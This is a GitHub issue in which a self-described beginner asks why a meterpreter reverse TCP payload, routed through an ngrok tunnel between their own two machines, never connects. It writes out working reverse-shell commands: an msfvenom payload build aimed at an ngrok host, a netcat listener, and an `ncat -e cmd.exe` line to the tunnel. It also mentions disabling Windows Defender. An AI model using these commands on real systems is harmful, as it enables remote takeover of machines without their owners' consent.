### ISSUE TITLE
meterpreter reverese tcp doesn't even show connection to ngrok server

### ISSUE THREAD

**Issue by mikyjet06** [rapid7/metasploit-framework#18245]
Hello guys, I am new and still learning metasploit and other general network ideas and functioning. I have, for fun and testing, tried to make a reverse tcp on metasploit on LAN and that worked just fine. But I wanted to also try to do it without the two computers being on the same network. I have done a quick google search and it seemed quite obvious that the easiest option that does not involve any port forwarding is using ngrok. To try this I used my kali linux computer and my windows computer both on different networks. I have started by installing ngrok on the kali machine. I ran the command `./ngrok tcp 4444` this started a server on 0.tcp.ngrok.io:158xx. I have than ran the command `msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=158xx -f exe > test.exe` after that I copied this file through google drive to the windows machine (I did not think of anything better than google drive, I also had to disable windows defender for this). I than opened msfconsole and ran used exploit/multi/handler `set lhost <local ip of the computer>` `set lport 4444` after that did not work I even tried setting ReverseListenerBindAddress 127.0.0.1 and ReverseListenerBindPort 4444. But I think my problem is somewhere else because when running the test.exe script on my windows machine I don't even see anything popping up on the ngrok info display. I have also tried to start a revers shell with netcat by running `nc -lnvp 4444` on the kali and `ncat -e cmd.exe 0.tcp.ngrok.io 158xx` on the windows machine, and that worked just fine. I understand that when starting I should not be learning metasploit but I just want to try it for fun, also meterpreter shell seems more powerfull than regular cmd through netcat. 

TL DR: When running reverse_tcp exe file on target machine that should connect through ngrok server nothing happens.

I hope that I made some obvious begginer mistake, and that it is not something blocked by my router if you have at least a slight idea or just a mere suggestion please respond to this question. I have not marked it as a bug because I am pretty sure that I made a mistake. Thank you for every relevant response.
